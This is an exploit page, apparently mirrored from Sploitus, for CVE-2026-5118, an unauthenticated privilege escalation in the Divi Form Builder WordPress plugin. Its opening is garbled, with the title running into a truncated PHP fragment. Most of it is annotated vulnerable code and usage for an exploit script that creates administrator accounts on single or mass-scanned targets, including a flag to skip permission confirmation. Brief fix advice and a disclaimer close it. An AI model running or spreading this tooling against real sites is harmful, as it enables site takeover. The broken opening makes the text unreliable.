Share
## https://sploitus.com/exploit?id=B4DABD5C-431B-519B-B5DB-C7A24B7D91ED
# CVE-2026-5118 โ€” Divi Form Builder roles) && !isset($roles_obj->roles[$role])) {
    $role = 'subscriber';  // โ† "administrator" EXISTS, so this check PASSES
}

// ~ line 2301 โ€” Directly applies the injected role
$user = new WP_User($user_id);
$user->set_role($role);  // โ† PRIVILEGE ESCALATION!
```

๐Ÿš€ **Usage**

### Single Target

```bash
python3 exploit.py -t http://target.com
python3 exploit.py -t https://target.com -u hacker -p Pass123! -e hack@proton.me
```

### Mass Scan (List without http/https)

Create `targets.txt`:
```
target1.com
target2.com:8080
192.168.1.50
subdomain.target.com
```

```bash
python3 exploit.py -l targets.txt -T 20
```

### Options

| Flag | Description |
|---|---|
| `-t, --target` | Single target URL |
| `-l, --list` | File with target list (one per line, http/https optional) |
| `-T, --threads` | Threads for mass scan (default: 10) |
| `-o, --output` | Output file for results (default: `result.txt`) |
| `-u, --username` | Custom username for new account |
| `-p, --password` | Custom password for new account |
| `-e, --email` | Custom email for new account |
| `-v, --verbose` | Verbose debug output |
| `--no-confirm` | Skip permission confirmation prompt |

๐Ÿ›  **Fix Recommendations**

```php
// SECURE: Allowlist only safe roles for public registration
$allowed_registration_roles = array('subscriber', 'contributor');
if (!in_array($role, $allowed_registration_roles, true)) {
    $role = 'subscriber';  // โ† Reject ALL dangerous roles
}
```

- Remove the `role` hidden input from frontend forms entirely
- Add `current_user_can('create_users')` capability checks for privileged roles
- Implement strict nonce verification scoped per-form instead of global
- Add rate limiting on the registration AJAX endpoint

๐Ÿง  **Researcher**

- Credit: [0xd4rk5id3](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3)

๐Ÿ“š **References**

- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/divi-form-builder/divi-form-builder-512-unauthenticated-privilege-escalation-via-role)
- [Original CVE Repository](https://github.com/zycoder0day/CVE-2026-5118)

๐Ÿ”’ **Disclaimer:**

This information is provided for **educational** and **authorized penetration testing** purposes only. Unauthorized exploitation of computer systems is illegal and unethical. Always obtain explicit written permission before testing any target you do not own.